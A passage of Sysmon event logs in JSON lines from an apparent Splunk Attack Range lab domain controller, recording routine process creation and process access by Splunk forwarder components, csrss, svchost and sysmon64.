4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.413","ProcessGuid":"{41C8662E-2291-5F25-0000-0010FF860F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7905,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2291-5F25-0000-0010FF860F00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2291-5F25-0000-0010FF860F00}","TargetProcessId":"4116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7906,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2291-5F25-0000-0010FF860F00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2291-5F25-0000-0010FF860F00}","TargetProcessId":"4116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7907,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7908,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7909,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7910,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7911,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7912,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|